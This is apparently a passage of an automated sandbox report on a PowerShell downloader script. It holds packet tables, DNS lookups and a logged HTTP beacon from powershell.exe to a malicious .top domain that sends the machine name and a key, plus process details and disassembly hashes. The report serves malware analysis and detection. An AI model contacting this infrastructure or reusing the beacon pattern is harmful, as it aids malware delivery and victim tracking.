                                                                                                                  Dec 27, 2024 07:18:12.920355082 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.920427084 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.920475960 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.927042961 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.927088022 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.975534916 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.975636959 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.975686073 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.979731083 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.979872942 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.979917049 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.988097906 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.029195070 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:13.056966066 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.057102919 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.057159901 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:13.059639931 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.059727907 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.059772968 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:13.064757109 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.066226959 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.066277981 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:13.066329956 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.071365118 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.071405888 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:13.077137947 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.077275038 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.077325106 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:13.079804897 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.090199947 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.090274096 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:13.090405941 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.093945980 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.094021082 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:13.108026981 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.108082056 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:13.108141899 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:13.340612888 CET4970480192.168.2.545.61.136.138
                                                                                                                  Dec 27, 2024 07:18:13.341295958 CET4970580192.168.2.5142.250.181.68

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 27, 2024 07:18:09.003536940 CET5251253192.168.2.51.1.1.1
                                                                                                                  Dec 27, 2024 07:18:09.143201113 CET53525121.1.1.1192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:10.628185987 CET5173853192.168.2.51.1.1.1
                                                                                                                  Dec 27, 2024 07:18:10.768263102 CET53517381.1.1.1192.168.2.5

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Dec 27, 2024 07:18:09.003536940 CET192.168.2.51.1.1.10x5175Standard query (0)gajaechkfhfghal.topA (IP address)IN (0x0001)false
                                                                                                                  Dec 27, 2024 07:18:10.628185987 CET192.168.2.51.1.1.10x2527Standard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Dec 27, 2024 07:18:09.143201113 CET1.1.1.1192.168.2.50x5175No error (0)gajaechkfhfghal.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                                  Dec 27, 2024 07:18:10.768263102 CET1.1.1.1192.168.2.50x2527No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • gajaechkfhfghal.top
                                                                                                                  • www.google.com

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.54970445.61.136.138807128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 27, 2024 07:18:09.283617973 CET216OUTGET /26te7apny8htr.php?id=user-PC&key=60099241868&s=527 HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                  Host: gajaechkfhfghal.top
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 27, 2024 07:18:10.626902103 CET166INHTTP/1.1 302 Found
                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                  Date: Fri, 27 Dec 2024 06:18:10 GMT
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: keep-alive
                                                                                                                  Location: http://www.google.com


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.549705142.250.181.68807128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 27, 2024 07:18:10.892837048 CET159OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                  Host: www.google.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 27, 2024 07:18:12.644059896 CET1236INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 27 Dec 2024 06:18:12 GMT
                                                                                                                  Expires: -1
                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-GftoqWXMObjIEQBfsjleVg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                  Server: gws
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Set-Cookie: AEC=AZ6Zc-VtdiBZHa9Yd_laqzO8ANFk3funNtqb0DeR73jJlYxdHjJ3qlh8Tw; expires=Wed, 25-Jun-2025 06:18:12 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                  Set-Cookie: NID=520=dTniz7caiIUxuzy-GrTiEoQvDH2Or6_13hqo5XOnqJuvG664zA9D-E-AKMxrVkdq7Au2jYr8vuaQaLpm0gQ3Q8CA8BoJfer34eOiAFp9U_zf2U2rcPtthYgOnVr5Y79VbpUvLd_F3ct2sfG2qkkYXDa2yvo0DZBvs0m036-rDwBuOTwGKAOqOrQOpQfUq1qreHnHi4Ko; expires=Sat, 28-Jun-2025 06:18:12 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                  Accept-Ranges: none
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Data Raw: 33 63 61 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76
                                                                                                                  Data Ascii: 3caf<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, v
                                                                                                                  Dec 27, 2024 07:18:12.644078016 CET1236INData Raw: 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75
                                                                                                                  Data Ascii: ideos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/log
                                                                                                                  Dec 27, 2024 07:18:12.644088984 CET1236INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 70 45 5a 75 5a 34 50 54 44 5a 47 51 78 63 38 50 70 72 6a 54 36 51 67 27 2c 6b 45 58 50 49 3a 27 30 2c 33 37 30 30 32 39 39 2c 36 35 30 2c 34 33 35 2c 35 33 38 36 36 31 2c 32
                                                                                                                  Data Ascii: function(){var _g={kEI:'pEZuZ4PTDZGQxc8PprjT6Qg',kEXPI:'0,3700299,650,435,538661,2872,2891,89155,78219,256416,10161,45786,9779,99404,3801,2412,50869,7734,26,39322,1427,87,118,29279,27083,5213672,585,5992270,2842711,26,23,27977954,25224045,4636
                                                                                                                  Dec 27, 2024 07:18:12.644212008 CET1236INData Raw: 32 35 2c 33 32 38 2c 36 36 37 2c 31 32 30 34 2c 32 2c 36 2c 36 34 33 2c 36 38 37 2c 31 30 39 31 2c 31 2c 32 31 33 35 30 30 34 38 2c 33 37 31 39 38 2c 31 38 2c 32 37 38 30 2c 37 30 32 2c 38 36 38 2c 35 32 34 30 2c 34 30 2c 31 36 30 2c 35 35 33 2c
                                                                                                                  Data Ascii: 25,328,667,1204,2,6,643,687,1091,1,21350048,37198,18,2780,702,868,5240,40,160,553,1664,110,8,2065,3,1207,598,12,5986024,1180553,857535',kBL:'xroT',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.go
                                                                                                                  Dec 27, 2024 07:18:12.644223928 CET1236INData Raw: 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                  Data Ascii: d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){google.y={};google.sy=[];var d;(d=google).x||(d.x
                                                                                                                  Dec 27, 2024 07:18:12.644236088 CET1236INData Raw: 74 65 28 22 64 61 74 61 2d 6e 6f 68 72 65 66 22 29 3d 3d 3d 22 31 22 3b 62 72 65 61 6b 20 61 7d 61 3d 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63
                                                                                                                  Data Ascii: te("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-lef
                                                                                                                  Dec 27, 2024 07:18:12.644248009 CET776INData Raw: 64 6f 77 3a 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 74 6f 20 2e 67 62 6d 2c 2e 67 62 74 6f 20 23 67 62 73 7b 74 6f 70 3a 32 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23
                                                                                                                  Data Ascii: dow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-mo
                                                                                                                  Dec 27, 2024 07:18:12.644260883 CET1236INData Raw: 34 6d 31 2c 23 67 62 69 34 73 2c 23 67 62 69 34 74 7b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 63 2c 2e 67 62 6d 63 2c 2e 67 62 6d 63 63 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30
                                                                                                                  Data Ascii: 4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{display:block;list-style:none;margin:0;padding:0}.gbmc{background:#fff;padding:10px 0;position:relative;z-index:2;zoom:1}.gbt{position:relative;display:-moz-inline-box;display:inline-block;line-heigh
                                                                                                                  Dec 27, 2024 07:18:12.644525051 CET1236INData Raw: 3a 2d 32 37 70 78 20 2d 32 32 70 78 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 70 61 64 64 69 6e 67 3a 32 39 70 78 20 30 20 30 3b 2a 70 61 64 64 69 6e 67 3a 32 37 70 78 20 30 20 30 3b 77 69 64 74 68 3a 31 70 78 7d 2e 67 62
                                                                                                                  Data Ascii: :-27px -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;width:1px}.gbzt:hover,.gbzt:focus,.gbgt-hvr,.gbgt:focus{background-color:#4c4c4c;background-image:none;_background-image:none;background-position:0 -102px;background-repeat:r
                                                                                                                  Dec 27, 2024 07:18:12.644539118 CET1236INData Raw: 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e
                                                                                                                  Data Ascii: kground:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:0 0;display:block;font-size:0;height:17px;width:16px}.gbto #gbi5{background-position:-6px -22px}.gbn .gbmt,.gbn .gbmt:visited,.gbnd .gbmt,.gbnd .gbmt:visited{co
                                                                                                                  Dec 27, 2024 07:18:12.764683962 CET1236INData Raw: 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23
                                                                                                                  Data Ascii: gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-shadow:0 2px 4px rgba(0,0,0,.12);-webkit-box-shadow:0 2px


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:01:18:04
                                                                                                                  Start date:27/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:01:18:04
                                                                                                                  Start date:27/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF848EA7566 Relevance: .5, Instructions: 485COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1efd5599d722a964cdb80ca2d21465b35289d96e93bdb81dd03b088902ff9d84
                                                                                                                    • Instruction ID: 2d70eef15e7eac9683b20f3e96ba487339c7e0a4a2b20d741e80dcb2612d1b8f
                                                                                                                    • Opcode Fuzzy Hash: 1efd5599d722a964cdb80ca2d21465b35289d96e93bdb81dd03b088902ff9d84
                                                                                                                    • Instruction Fuzzy Hash: D5F1903090DA8E8FEBA8EF28CC557E93BD1FF54750F04426AE84DC7291DB3499458B82
                                                                                                                    Function 00007FF848EA8389 Relevance: .4, Instructions: 401COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 89d7f186b1a5a377e9a4263f6bbae48e85968e1c21df2921a56e478731aa5f5c
                                                                                                                    • Instruction ID: d5d2046e6116bacadc25abc9eceb549bbcac85cadb0749d034f220b2d05eabde
                                                                                                                    • Opcode Fuzzy Hash: 89d7f186b1a5a377e9a4263f6bbae48e85968e1c21df2921a56e478731aa5f5c
                                                                                                                    • Instruction Fuzzy Hash: E9D1913090CA4D8FEBA8EF28D8557E977D1FB54740F14822EE80DC7295DF34A9418B85
                                                                                                                    Function 00007FF848E95575 Relevance: .8, Instructions: 822COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 525e41dcbf68b3a6c02910b03afa0fb54f200e022ec0c462c8a70e4e73dfd94b
                                                                                                                    • Instruction ID: 077284d17f5b0dcd9224caaa83e2c0c2e1f132ba1cbc5b66c849323b9c68fe83
                                                                                                                    • Opcode Fuzzy Hash: 525e41dcbf68b3a6c02910b03afa0fb54f200e022ec0c462c8a70e4e73dfd94b
                                                                                                                    • Instruction Fuzzy Hash: 9142F630A1CA498FDB98EF58C495AB9BBE1FF68354F14017ED44AC7292DB74E842C781
                                                                                                                    Function 00007FF848E9843D Relevance: .6, Instructions: 581COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 245cd777332fe68aa5f9ddb20154d3f45230aed2e5c6d785b8b006761e2501d2
                                                                                                                    • Instruction ID: a0b4cb10fd9dd1b2aab4d03339de0cc235088d948191143be0995db263ba2012
                                                                                                                    • Opcode Fuzzy Hash: 245cd777332fe68aa5f9ddb20154d3f45230aed2e5c6d785b8b006761e2501d2
                                                                                                                    • Instruction Fuzzy Hash: B4020730A0CA598FDB89EF5CC485AA9BBE1FF59314F1441B9D44DC72A2CB74E842CB91
                                                                                                                    Function 00007FF849143B26 Relevance: .4, Instructions: 417COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2216479759.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff849140000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 204db633bf7985a15876c178d83b39e9e11c9469751158ed4b156201aae321bb
                                                                                                                    • Instruction ID: ae20bf1d9664ee86db18bd5b18028e24e65bb4b877cc92c119ad979865e9c6d2
                                                                                                                    • Opcode Fuzzy Hash: 204db633bf7985a15876c178d83b39e9e11c9469751158ed4b156201aae321bb
                                                                                                                    • Instruction Fuzzy Hash: ACC11521A0EBC58FE7A6AB3C58556B07FE1EF5A250F1901FBC089CB193D91CAC46C752
                                                                                                                    Function 00007FF848EA7F26 Relevance: .3, Instructions: 333COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9985a7fcf5b7ca6c5ed58a1f6e2be05edc3ca07a2b2c27307bf1f4a70b375941
                                                                                                                    • Instruction ID: c878a94d13ece4fc80512a0b996e181b99b6e6585aae70a5f53040c88e141273
                                                                                                                    • Opcode Fuzzy Hash: 9985a7fcf5b7ca6c5ed58a1f6e2be05edc3ca07a2b2c27307bf1f4a70b375941
                                                                                                                    • Instruction Fuzzy Hash: 7CB1A43090CB8D4FEBA8EF2898557E93BE1FF55350F04426EE84DC7292DB3499458B86
                                                                                                                    Function 00007FF848F60060 Relevance: .3, Instructions: 273COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2212359778.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848f60000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6bc3fdd5a7d855941608203ab3d5613dfc1262c5260c49b318638da2f1ecb15a
                                                                                                                    • Instruction ID: 3078ffbafe93841e6a82c448617bb03e6bdfde51cc74a087046bf9b199bb0947
                                                                                                                    • Opcode Fuzzy Hash: 6bc3fdd5a7d855941608203ab3d5613dfc1262c5260c49b318638da2f1ecb15a
                                                                                                                    • Instruction Fuzzy Hash: 2581AF32E0EBC58FE757AB3858646603FE0AF97250F1901FAC848DB1E3DA1D9C4A8355
                                                                                                                    Function 00007FF849143B4E Relevance: .2, Instructions: 204COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2216479759.00007FF849140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849140000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff849140000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ba45ed0c23d127160f18a56df3290817ed010434f5ea538f762f9812535d3d70
                                                                                                                    • Instruction ID: deee045e67b40e9fced38e4e12482f1beb686c9278819960892bb40fcf3e0a27
                                                                                                                    • Opcode Fuzzy Hash: ba45ed0c23d127160f18a56df3290817ed010434f5ea538f762f9812535d3d70
                                                                                                                    • Instruction Fuzzy Hash: 4B61DE2194EBC65FE793AB7848646613FE1AF5B250B0E40EFD0C8CB0A3D51D984BC762
                                                                                                                    Function 00007FF848EA1F10 Relevance: .2, Instructions: 153COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211758693.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 181093f43a3e554ea5734f08530a2682f0b84f20d471e3570e76be7ea8343e41
                                                                                                                    • Instruction ID: 018d50c22c274c42dc757bcb42286ebd2fb7d99168e743790d99cab740abac8a
                                                                                                                    • Opcode Fuzzy Hash: 181093f43a3e554ea5734f08530a2682f0b84f20d471e3570e76be7ea8343e41
                                                                                                                    • Instruction Fuzzy Hash: 1E412671D0CB885FDB199B1CA8065A97FE0FF9A710F0442AFD449C3293CB20A85A87C6
                                                                                                                    Function 00007FF848F600DD Relevance: .1, Instructions: 130COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2212359778.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848f60000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c222f839b6f1c60d08efbb433c96f191101a3c46b4cc75449d8443439e81a15a
                                                                                                                    • Instruction ID: cd66df529e319083ded04c74f97dcb494cdb48369b81704b15544b7b6bffd787
                                                                                                                    • Opcode Fuzzy Hash: c222f839b6f1c60d08efbb433c96f191101a3c46b4cc75449d8443439e81a15a
                                                                                                                    • Instruction Fuzzy Hash: CB31F631A0DB898FD756EB2888645643BA1EFA6310F1901FBC449DB1D3DA29EC46C381
                                                                                                                    Function 00007FF848D7E540 Relevance: .1, Instructions: 126COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2211156904.00007FF848D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D7D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff848d7d000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
